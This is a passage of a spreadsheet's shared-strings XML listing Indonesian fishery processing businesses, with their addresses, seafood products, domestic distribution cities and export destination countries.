    <t>Kota Jakarta Pusat, Kota Semarang</t>
  </si>
  <si>
    <t>Jl. Tenggiri No.11, Kel. Bagan Asahan, Kec. Tanjung Balai, Kabupaten Asahan&lt;br&gt;Sumatera Utara</t>
  </si>
  <si>
    <t>Jl. Ahmad Yani No.27, Kel. Sei Berombang, Kec. Panai Hilir, Kabupaten Labuhan Batu&lt;br&gt;Sumatera Utara</t>
  </si>
  <si>
    <t>Dusun Lekok Timur, Kel. Gondang, Kec. Gangga, Kabupaten Lombok Utara&lt;br&gt;Nusa Tenggara Barat</t>
  </si>
  <si>
    <t>Kabupaten Lombok Utara</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Lemadang, Meka, Marlin, Deho, Kembung, Makerel, Malalugis, Sarden, Cakalang, Tenggiri)</t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Surabaya, Kota Denpasar, Kota Bitung</t>
  </si>
  <si>
    <t>C√¥te d'Ivoire, Ecuador, Japan, Panama, Sri Lanka, Suriname, Thailand</t>
  </si>
  <si>
    <t>Jl. Muara Baru Ujung Blok T No.1 RT 22 RW 17, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Amberjack, Hamachi, Seabass, Alaska Pollack, Butterfish, Pufferfish)</t>
  </si>
  <si>
    <t>Telur Bulu Babi Beku</t>
  </si>
  <si>
    <t>Ikan Demesal Beku (Kakap, Hirame, Founder, Kimnedai, Monkfish, Mutsu, Kinki, Cod)</t>
  </si>
  <si>
    <t>Udang Masak Kupas</t>
  </si>
  <si>
    <t>Germany, Netherlands</t>
  </si>
  <si>
    <t>Jl. Sawah Desa RT 3 RW 2, Kel. Kedungpedaringan, Kec. Kepanjen, Kabupaten Malang&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Jl. Rembang Industri II/36, 36A, 36B, Kawasan Berikat (EPZ) PIER, Kel. Pejangkungan, Kec. Rembang, Kabupaten Pasuruan&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Komplek Industri dan Pergudangan Taman Tekno Tahap 2 Sektor XI Blok J2 No.15, Kel. Setu, Kec. Setu, Kota Tangerang Selatan&lt;br&gt;Banten</t>
  </si>
  <si>
    <t>Kota Tangerang Selatan</t>
  </si>
  <si>
    <t>Pergudangan Safe Lock Blok AH 5806, Kel. Pucang Anom, Kec. Sidoarjo, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Kakap Putih, Gabus Laut, Gulama, Lencam, Manyung)</t>
  </si>
  <si>
    <t>Kota Jakarta Utara, Kabupaten Rembang, Kabupaten Sidoarjo, Kota Probolinggo, Kota Surabaya</t>
  </si>
  <si>
    <t>Jl. Ikan Tuna Barat II - Pelabuhan Benoa, Kel. Pedungan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali</t>
  </si>
  <si>
    <t>Ikan Pelagis Fillet Beku (Lemadang, Marlin, Gindara, Layaran, Cakalang, Todak, Tenggiri)</t>
  </si>
  <si>
    <t>Kota Jakarta Pusat, Kabupaten Cilacap, Kota Semarang, Kota Surabaya</t>
  </si>
  <si>
    <t>China, Hong Kong, Japan, Korea, Democratic People's Republic of, Singapore, Thailand, Viet Nam</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Baby Tuna, Tongkol, Deho, Kembung, Selar, Cakalang, Barakuda)</t>
  </si>
  <si>
    <t>Pelabuhan Tengkayu II, Kel. SDF Pelabuhan, Kec. Tarakan Tengah, Kota Tarakan&lt;br&gt;Kalimantan Utara</t>
  </si>
  <si>
    <t>Jl. Yos Sudarso Pelabuhan Perikanan Pantai Tenau, Kel. Alak, Kec. Alak, Kota Kupang&lt;br&gt;Nusa Tenggara Timur</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Lencam, Anggoli, Kerapu, Bawal, Kakap, Layur)</t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Surabaya, Kota Denpasar, Kota Kupang, Kota Makassar</t>
  </si>
  <si>
    <t>Australia, China, Hong Kong, Japan, Malaysia, Singapore, Taiwan, Province of China</t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Surabaya, Kota Denpasar, Kota Kupang</t>
  </si>
  <si>
    <t>Sotong Segar</t>
  </si>
  <si>
    <t>Jl. Raya Manado - Bitung, Kel. Tontalete, Kec. Kema, Kabupaten Minahasa Utara&lt;br&gt;Sulawesi Utara</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Baby Tuna, Tongkol, Deho, Malalugis, Layang, Cakalang)</t>
  </si>
  <si>
    <t>Jl. Garuda Lk II, Kel. Beting Kuala Kapias, Kec. Teluk Nibung, Kota Tanjung Balai&lt;br&gt;Sumatera Utara</t>
  </si>
  <si>
    <t>China, Malaysia, Viet Nam</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Biji Nangka, Sukang, Bawal, Samge, Malong, Layur)</t>
  </si>
  <si>
    <t>Jl. Hurnala II, Kel. Tulehu, Kec. Salahutu, Kabupaten Maluku Tengah&lt;br&gt;Maluku</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Baby Tuna, Cakalang)</t>
  </si>
  <si>
    <t>Japan, Philippines, Thailand, Viet Nam</t>
  </si>
  <si>
    <t>Australia, Thailand, United States, Viet Nam</t>
  </si>
  <si>
    <t>Jl. Pelem, Kel. Bulusari, Kec. Gempol, Kabupaten Pasuruan&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Kabupaten Boyolali, Kota Tangerang</t>
  </si>
  <si>
    <t>Desa Ngele-ngele Besar, Kec. Morotai Selatan Barat, Kabupaten Pulau Morotai&lt;br&gt;Maluku Utara</t>
  </si>
  <si>
    <t>Kota Surabaya, Kabupaten Halmahera Utara, Kabupaten Pulau Morotai, Kota Ternate</t>
  </si>
  <si>
    <t>China, Japan, Kazakhstan</t>
  </si>
  <si>
    <t>Desa Temperak No.77 RT 06 RW 01, Kec. Sarang, Kabupaten Rembang&lt;br&gt;Jawa Tengah</t>
  </si>
  <si>
    <t>Kabupaten Semarang, Kota Surabaya</t>
  </si>
  <si>
    <t>Komplek PPS Kendari Jl. Tuna 5, Kel. Puday, Kec. Abeli, Kota Kendari&lt;br&gt;Sulawesi Tenggara</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Lencam, Kerapu, Kakatua, Kakap Merah, Kaci-kaci)</t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Barat, Kota Jakarta Utara, Kota Surabaya</t>
  </si>
  <si>
    <t>China, Japan, Korea, Democratic People's Republic of, Oman, Viet Nam</t>
  </si>
  <si>
    <t>Kota Jakarta Utara, Kabupaten Sidoarjo, Kota Surabaya</t>
  </si>
  <si>
    <t>China, Japan, Malaysia</t>
  </si>
  <si>
    <t>China, Japan, Korea, Democratic People's Republic of, Malaysia</t>
  </si>
  <si>
    <t>Jl. Wolter Monginsidi No.28, Kel. Nalu, Kec. Baolan, Kabupaten Toli-Toli&lt;br&gt;Sulawesi Tengah</t>
  </si>
  <si>
    <t>Thailand, United States</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Lencam, Pisang-pisang, Kuwe, Kerapu, Kakatua, Kakap)</t>
  </si>
  <si>
    <t>Komplek Pergudangan Margomulyo Permai Blok N-10A, Kel. Asem Rowo, Kec. Asem Rowo, Kota Surabaya&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kota Jakarta Utara, Kota Surabaya, Kota Denpasar</t>
  </si>
  <si>
    <t>China, Japan, Korea, Democratic People's Republic of, Malaysia, Singapore, Taiwan, Province of China, Viet Nam</t>
  </si>
  <si>
    <t>Kota Jakarta Barat, Kota Surabaya, Kota Denpasar</t>
  </si>
  <si>
    <t>Kabupaten Lampung Barat, Kabupaten Lampung Selatan, Kabupaten Lampung Timur, Kota Jakarta Barat, Kota Jakarta Utara, Kota Bogor, Kota Bandung, Kota Bekasi, Kota Depok, Kabupaten Tangerang</t>
  </si>
  <si>
    <t>Jl. Dorang No.2, Kel. Tasikagung, Kec. Rembang, Kabupaten Rembang&lt;br&gt;Jawa Tengah</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Lemuru, Deho, Kembung, Marlin, Layang, Cakalang, Tenggiri)</t>
  </si>
  <si>
    <t>Kota Jakarta Utara, Kabupaten Rembang, Kota Surabaya</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Swanggi, Manyung, Kerapu, Layur, Bawal, Kakap Merah, Jenggot, Rejung, Kurisi)</t>
  </si>
  <si>
    <t>Kota Jakarta Utara, Kabupaten Semarang, Kota Surabaya</t>
  </si>
  <si>
    <t>Australia, China, Korea, Democratic People's Republic of, Philippines</t>
  </si>
  <si>
    <t>Dusun Sampangan RT 003 RW 001, Kel. Kedungrejo, Kec. Muncar, Kabupaten Banyuwangi&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Bonito, Makerel, Lemadang, Marlin, Layaran)</t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Bandung, Kota Yogyakarta, Kabupaten Banyuwangi, Kota Surabaya, Kota Denpasar</t>
  </si>
  <si>
    <t>Australia, Brunei Darussalam, Hong Kong, India, Japan, Korea, Democratic People's Republic of, Malaysia, Pakistan, Philippines, Singapore, Thailand, United Arab Emirates, United States, Viet Nam</t>
  </si>
  <si>
    <t>Jl. Poros Limunjan Gg. Sulawesi RT 019, Kel. Sambaliung, Kec. Sambaliung, Kabupaten Berau&lt;br&gt;Kalimantan Timur</t>
  </si>
  <si>
    <t>Kabupaten Rembang, Kota Semarang</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Marlin, Cakalang, Tenggiri)</t>
  </si>
  <si>
    <t>Canada, Korea, Republic of, United States</t>
  </si>
  <si>
    <t>Jl. Brantas KM 2, Kel. Pilang, Kec. Kademangan, Kota Probolinggo&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Kabupaten Pasuruan, Kabupaten Sidoarjo, Kabupaten Mojokerto</t>
  </si>
  <si>
    <t>Canada, Japan, Malaysia, Singapore, United States</t>
  </si>
  <si>
    <t>Desa Sobontoro RT 002 RW 003, Kec. Tambakboyo, Kabupaten Tuban&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Swanggi, Lencam, Anggoli, Kerapu, Layur, Bawal, Kakap, Kuro, Kurisi, Tonang)</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Kuwe, Talang-talang, Rejung, Tenggiri)</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Swanggi, Gulama, Kuniran, Kapas-kapas, Kurisi, Tonang)</t>
  </si>
  <si>
    <t>Canada, Malaysia, Singapore</t>
  </si>
  <si>
    <t>Ikan Air Tawar Beku (Lele, Gurami, Bandeng, Nila)</t>
  </si>
  <si>
    <t>Ikan Asin</t>
  </si>
  <si>
    <t>Jl. T. Nyak Makam No.04, Kel. Le Masen Kayee Adang, Kec. Syiah Kuala, Kota Banda Aceh&lt;br&gt;Aceh</t>
  </si>
  <si>
    <t>China, Japan, Malaysia, Philippines, Saudi Arabia, Singapore</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Tongkol, Deho, Kembung, Marlin, Layang, Cakalang, Tenggiri)</t>
  </si>
  <si>
    <t>Kota Batam, Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Surabaya</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Kuwe, Kerapu, Kakap)</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Baby Tuna, Tongkol, Malalugis, Layang, Cakalang)</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Baby Tuna, Tongkol, Malalugis, Layang, Cakalang)</t>
  </si>
  <si>
    <t>Jl. Buntu Komplek Pelabuhan Perikanan Pantai Tarakan, Kel. Karang Anyar Pantai, Kec. Tarakan Barat, Kota Tarakan&lt;br&gt;Kalimantan Utara</t>
  </si>
  <si>
    <t>Kepiting Masak Beku</t>
  </si>
  <si>
    <t>Singapore, Taiwan, Province of China</t>
  </si>
  <si>
    <t>Mendongan, Kel. Bandung, Kec. Playen, Kabupaten Gunung Kidul&lt;br&gt;Daerah Istimewa Yogyakarta</t>
  </si>
  <si>
    <t>Lanting Rumput Laut</t>
  </si>
  <si>
    <t>Kota Surakarta, Kota Semarang, Kabupaten Gunung Kidul, Kota Yogyakarta, Kota Surabaya</t>
  </si>
  <si>
    <t>Lanting Lele</t>
  </si>
  <si>
    <t>Jl. Pembangunan I No.8, Kel. Batuceper, Kec. Batujaya, Kota Tangerang&lt;br&gt;Banten</t>
  </si>
  <si>
    <t>Jl. Raya Pelabuhan Benoa, Kel. Pedungan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali</t>
  </si>
  <si>
    <t>Kota Jakarta Utara, Kabupaten Banyuwangi, Kabupaten Pasuruan, Kabupaten Jembrana, Kota Denpasar</t>
  </si>
  <si>
    <t>China, Hong Kong, Japan, United States</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Baby Tuna, Tongkol, Cakalang)</t>
  </si>
  <si>
    <t>Kabupaten Jembrana, Kabupaten Tabanan, Kabupaten Klungkung, Kota Denpasar</t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kota Jakarta Pusat, Kota Surabaya, Kota Denpasar</t>
  </si>
  <si>
    <t>Kota Surabaya, Kota Denpasar</t>
  </si>
  <si>
    <t>China, Honduras, Japan, United States</t>
  </si>
  <si>
    <t>Jl. Kawasan Industri Makassar 3/K-4B, Kel. Daya, Kec. Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Gulama, Kerapu, Layur, Kakatua, Bawal, Kakap, Malong, Rejung)</t>
  </si>
  <si>
    <t>Japan, Thailand, United States</t>
  </si>
  <si>
    <t>Ikan Demersal Masak Beku</t>
  </si>
  <si>
    <t>Ikan Pelagis Masak Beku</t>
  </si>
  <si>
    <t>Canada, Korea, Democratic People's Republic of, United States</t>
  </si>
  <si>
    <t>Salmon Masak Beku</t>
  </si>
  <si>
    <t>Jl. Raya Lintas Selatan RT 01 RW 01, Kel. Tasikmadu, Kec. Watulimo, Kabupaten Trenggalek&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Tongkol, Deho)</t>
  </si>
  <si>
    <t>Jl. Timor Timur No.5 KIM I, Kel. Mabar, Kec. Medan Deli, Kota Medan&lt;br&gt;Sumatera Utara</t>
  </si>
  <si>
    <t>Kota Tegal</t>
  </si>
  <si>
    <t>Jl. Kawasan Industri Gresik Kav C8 No.15, Kel. Randuagung, Kec. Kebomas, Kabupaten Gresik&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>France, Japan, United States</t>
  </si>
  <si>
    <t>Jl. Yos Sudarso Komplek PPI Dulanpokpok, Kel. Dulanpokpok, Kec. Pariwari, Kabupaten Fakfak&lt;br&gt;Papua Barat</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Kerapu, Kakap, Layur)</t>
  </si>
  <si>
    <t>Hong Kong, Thailand</t>
  </si>
  <si>
    <t>Jl. Sagerat Tanjung Merah Lingkungan III, Kel. Tanjung Merah, Kec. Matuari, Kota Bitung&lt;br&gt;Sulawesi Utara</t>
  </si>
  <si>
    <t>Kota Jakarta Utara, Kota Bitung</t>
  </si>
  <si>
    <t>Komplek Union Industrial Park Blok I No.08, Kel. Tanjung Sengkuang, Kec. Batu Ampar, Kota Batam&lt;br&gt;Kepulauan Riau</t>
  </si>
  <si>
    <t>Jl. Cakalang Kompleks Pelabuhan Perikanan Pantai Sorong, Kel. Klaligi, Kec. Sorong Manoi, Kota Sorong&lt;br&gt;Papua Barat</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Barramundi, Bawal, Lencam, Kakap)</t>
  </si>
  <si>
    <t>Air Bungkeh, Jorong Bahagia, Kel. Panti Utara, Kec. Panti, Kabupaten Pasaman&lt;br&gt;Sumatera Barat</t>
  </si>
  <si>
    <t>Kabupaten Pasaman, Kabupaten Pasaman Barat, Kota Padang, Kota Bukittinggi, Kota Payakumbuh</t>
  </si>
  <si>
    <t>Jl. Rengas No.1529 RT 021 RW 005, Kel. 20 Ilir, Kec. Ilir Timur II, Kota Palembang&lt;br&gt;Sumatera Selatan</t>
  </si>
  <si>
    <t>Jl. Pendidikan, Kunjung Mae, Kel. Bonto Lanra, Kec. Galesong Utara, Kabupaten Takalar&lt;br&gt;Sulawesi Selatan</t>
  </si>
  <si>
    <t>American Samoa, Australia, China, Hong Kong, Italy, Japan, Korea, Democratic People's Republic of, Malaysia, Singapore, Taiwan, Province of China, United States, Viet Nam</t>
  </si>
  <si>
    <t>Jl. Tuna Blok L No.3, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Deho, Kembung, Lemadang, Meka, Gindara, Salem, Muroaji, Layang, Cakalang, Tenggiri)</t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bogor, Kabupaten Bekasi, Kota Depok, Kabupaten Tangerang</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Gulama, Lencam, Kuwe, Kerapu, Remang, Bawal, Kakap, Kurisi, Selar Kuning, Ekor Kuning, Barramundi)</t>
  </si>
  <si>
    <t>Taman Tekno BSD Industrial Komplek Sektor XI, Jl. Tekno Utama Blok B No.1, Kel. Setu, Kec. Setu, Kota Tangerang Selatan&lt;br&gt;Banten</t>
  </si>
  <si>
    <t>Flakes Rumput Laut</t>
  </si>
  <si>
    <t>Kabupaten Sukabumi</t>
  </si>
  <si>
    <t>Tepung Karagenan (Milkvis, Aquagel, Aquavis), Tepung Alginat (FibroTec)</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Swanggi, Sebelah, Manyung, Kerapu, Layur, Bawal, Kakap)</t>
  </si>
  <si>
    <t>Kota Medan, Kota Jambi, Kota Surabaya</t>
  </si>
  <si>
    <t>Kp. Cikedokan RT 002 RW 001, Kel. Sukadanau, Kec. Cikarang Barat, Kabupaten Bekasi&lt;br&gt;Jawa Barat</t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bogor, Kabupaten Sukabumi, Kabupaten Bandung, Kabupaten Karawang, Kabupaten Bekasi, Kota Semarang, Kabupaten Pasuruan, Kabupaten Mojokerto, Kabupaten Jombang</t>
  </si>
  <si>
    <t>Australia, France, Germany, New Zealand, Thailand, United States</t>
  </si>
  <si>
    <t>Jl. Pantura Km 9,5, Kel. Landangan, Kec. Kapongan, Kabupaten Situbondo&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Belgium, Netherlands, United Kingdom</t>
  </si>
  <si>
    <t>Cephalopoda Masak Beku (Sotong, Gurita, Cumi-cumi)</t>
  </si>
  <si>
    <t>Belgium, Netherlands</t>
  </si>
  <si>
    <t>Belgium, Korea, Democratic People's Republic of</t>
  </si>
  <si>
    <t>Jl. Raya Tebel, Kel. Tebel, Kec. Gedangan, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Belgium, France, Korea, Democratic People's Republic of, Netherlands</t>
  </si>
  <si>
    <t>Jl. Raya Tanggulangin No.36, Kel. Kalitengah, Kec. Tanggulangin, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Kerupuk Campuran Ikan dan Udang</t>
  </si>
  <si>
    <t>Kota Jakarta Timur, Kota Jakarta Utara, Kabupaten Bogor, Kota Bekasi</t>
  </si>
  <si>
    <t>Jl. Garuda LK IV, Kel. Beting Kuala Kapias, Kec. Teluk Nibung, Kota Tanjung Balai&lt;br&gt;Sumatera Utara</t>
  </si>
  <si>
    <t>Jl. Nangka Komplek Bukit Merah RT 002 RW 001, Kel. Harjosari, Kec. Tebing, Kabupaten Karimun&lt;br&gt;Kepulauan Riau</t>
  </si>
  <si>
    <t>Jl. Kusuma Bangsa No.18, Kel. Panjang Wetan, Kec. Pekalongan Utara, Kota Pekalongan&lt;br&gt;Jawa Tengah</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Teri, Lemuru, Barakuda, Tude, Bonito, Tongkol)</t>
  </si>
  <si>
    <t>Kota Jakarta Utara, Kota Semarang, Kota Pekalongan, Kota Surabaya</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Kakap Putih, Bawal, Bunak, Swanggi, Gulama, Lencam, Kambing-Kambing)</t>
  </si>
  <si>
    <t>Kawasan Industri Wijayakusuma Jl. Tugu Industri IV No.3, Kel. Randugarut, Kec. Tugu, Kota Semarang&lt;br&gt;Jawa Tengah</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Swanggi, Malong, Gulama, Lencam, Anggoli, Kerapu)</t>
  </si>
  <si>
    <t>Australia, China, Japan, Korea, Democratic People's Republic of, Malaysia, Singapore, Taiwan, Province of China, Thailand, United States</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Baby Tuna, Tongkol, Kembung, Lemadang, Marlin, Cakalang)</t>
  </si>
  <si>
    <t>Australia, China, Japan, Korea, Democratic People's Republic of, Taiwan, Province of China, United States</t>
  </si>
  <si>
    <t>China, Japan, Korea, Democratic People's Republic of, Malaysia, Taiwan, Province of China, Thailand</t>
  </si>
  <si>
    <t>Australia, China, Japan, Korea, Democratic People's Republic of, Taiwan, Province of China, Thailand, United States</t>
  </si>
  <si>
    <t>Australia, China, Japan, Korea, Democratic People's Republic of, Malaysia, Taiwan, Province of China, Thailand, United States</t>
  </si>
  <si>
    <t>China, Japan, Korea, Democratic People's Republic of, Malaysia, Taiwan, Province of China, Thailand, Viet Nam</t>
  </si>
  <si>
    <t>Jl. Raya Manado - Bitung, Kel. Sagerat, Kec. Matuari, Kota Bitung&lt;br&gt;Sulawesi Utara</t>
  </si>
  <si>
    <t>China, Japan, Singapore</t>
  </si>
  <si>
    <t>Kota Banda Aceh, Kota Medan, Kota Palembang, Kota Batam, Kota Jakarta Utara, Kota Semarang, Kota Surabaya</t>
  </si>
  <si>
    <t>China, Hong Kong, Korea, Democratic People's Republic of, Malaysia, Singapore, Thailand, Viet Nam</t>
  </si>
  <si>
    <t>Tuna Bernilai tambah Beku</t>
  </si>
  <si>
    <t>Ikan Demersal Bernilai Tambah Beku</t>
  </si>
  <si>
    <t>Ikan Pelagis Bernilai Tambah Beku</t>
  </si>
  <si>
    <t>Ikan Air Tawar Bernilai Tambah Beku</t>
  </si>
  <si>
    <t>Kerang Pasteurisasi Beku</t>
  </si>
  <si>
    <t>Kerang Pasteurisasi Dingin</t>
  </si>
  <si>
    <t>Campuran Seafood Pasteurisasi Beku</t>
  </si>
  <si>
    <t>Jl. A. Yani No.88 Km 34 RT 002 RW 002, Kel. Nusa Indah, Kec. Bati-Bati, Kabupaten Tanah Laut&lt;br&gt;Kalimantan Selatan</t>
  </si>
  <si>
    <t>United Kingdom</t>
  </si>
  <si>
    <t>Jl. Raya Serang Km 12,5 Kampung Kadu RT 006 RW 001, Kel. Bunder, Kec. Cikupa, Kabupaten Tangerang&lt;br&gt;Banten</t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bogor, Kabupaten Bekasi, Kota Bogor, Kota Bekasi, Kota Depok, Kabupaten Pati, Kabupaten Tangerang, Kota Tangerang</t>
  </si>
  <si>
    <t>Tepung Jelly, Tepung Puding</t>
  </si>
  <si>
    <t>Jl. Pemelisan No.168 Suwung Batan Kendal, Kel. Sesetan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali</t>
  </si>
  <si>
    <t>Jl. Kapten Rahmadbudin, Gg Puskesmas Lk. 13, Kel. Terjun, Kec. Medan Marelan, Kota Medan&lt;br&gt;Sumatera Utara</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Kerapu, Layur, Kakap, Barramundi)</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Kembung, Tenggiri)</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Kembung, Tenggiri)</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Kerapu, Layur, Kakap, Barramundi)</t>
  </si>
  <si>
    <t>Jl. Tanjung Berkat No. 3, Kel. Teluk Tiram, Kec. Banjarmasin Barat, Kota Banjarmasin&lt;br&gt;Kalimantan Selatan</t>
  </si>
  <si>
    <t>China, Hong Kong, Japan, Korea, Democratic People's Republic of, Malaysia, Philippines, Taiwan, Province of China, Thailand, Viet Nam</t>
  </si>
  <si>
    <t>Jl. Kima Raya I Blok D No.2C, Kel. Daya, Kec. Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan</t>
  </si>
  <si>
    <t>American Samoa, Australia, Japan, Korea, Democratic People's Republic of, R√©union, Russian Federation</t>
  </si>
  <si>
    <t>American Samoa, Australia, Japan, Russian Federation</t>
  </si>
  <si>
    <t>Siput Segar</t>
  </si>
  <si>
    <t>Lobster Air Tawar Segar</t>
  </si>
  <si>
    <t>Kawasan Industri MM2100 Jalan Irian Blok FF No. 2, Kel. Danau Indah, Kec. Cikarang Barat, Kabupaten Bekasi&lt;br&gt;Jawa Barat</t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bekasi, Kota Bekasi</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Halibut)</t>
  </si>
  <si>
    <t>Jl. Lamelleng No.42, Kel. Bojo Baru, Kec. Mallusetasi, Kabupaten Barru&lt;br&gt;Sulawesi Selatan</t>
  </si>
  <si>
    <t>Jl. Lambau (Kawasan Propindo Gemilang) Kp. Babakan Rawa Haur No.02 RT 004 RW 006, Kel. Sentul, Kec. Babakan Madang, Kabupaten Bogor&lt;br&gt;Jawa Barat</t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bogor, Kabupaten Bekasi, Kota Bogor, Kota Bandung, Kota Bekasi, Kota Depok, Kota Semarang, Kota Surabaya, Kota Tangerang</t>
  </si>
  <si>
    <t>Canada, China, Hong Kong, Japan, Kuwait, Mexico, Puerto Rico, Saudi Arabia, United States</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Kerapu, Layur, Kakatua, Kakap, Barramundi)</t>
  </si>
  <si>
    <t>Kota Batam, Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Surabaya, Kota Makassar</t>
  </si>
  <si>
    <t>China, Japan, Malaysia, Saudi Arabia, Singapore, Thailand</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Kerapu, Layur, Kakatua, Kakap, Barramundi)</t>
  </si>
  <si>
    <t>Kota Batam, Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Surabaya, Kota Makassar</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Lemadang)</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Lemadang)</t>
  </si>
  <si>
    <t>Jl. Millenium 11 Blok F4 No.3, Kel. Peusar, Kec. Panongan, Kabupaten Tangerang&lt;br&gt;Banten</t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kota Surabaya, Kabupaten Tangerang</t>
  </si>
  <si>
    <t>Jl. Lingkar Timur No. 5, Kel. Tegalkamulyan, Kec. Cilacap Selatan, Kabupaten Cilacap&lt;br&gt;Jawa Tengah</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Sebelah, Layur)</t>
  </si>
  <si>
    <t>Lobster Rebus Beku</t>
  </si>
  <si>
    <t>Jl. Sukajadi Gg Mesjid RT 004 RW 004, Kel. Raja Bejamu, Kec. Sinaboi, Kabupaten Rokan Hilir&lt;br&gt;Riau</t>
  </si>
  <si>
    <t>Kota Tanjung Balai, Kota Pekanbaru</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Sembilang, Senangin)</t>
  </si>
  <si>
    <t>Kota Medan, Kota Pekanbaru</t>
  </si>
  <si>
    <t>Daging Kerang Rebus Beku</t>
  </si>
  <si>
    <t>Kota Medan, Kabupaten Bengkalis, Kota Pekanbaru, Kota Dumai</t>
  </si>
  <si>
    <t>Jl. Raya Pati - Juwana KM 7, Dukuh Guyangan RT 001 RW 005, Kel. Purworejo, Kec. Pati, Kabupaten Pati&lt;br&gt;Jawa Tengah</t>
  </si>
  <si>
    <t>Kota Jakarta Pusat, Kabupaten Rembang, Kabupaten Pati, Kota Semarang</t>
  </si>
  <si>
    <t>Kota Jakarta Pusat, Kabupaten Rembang, Kabupaten Pati, Kabupaten Semarang</t>
  </si>
  <si>
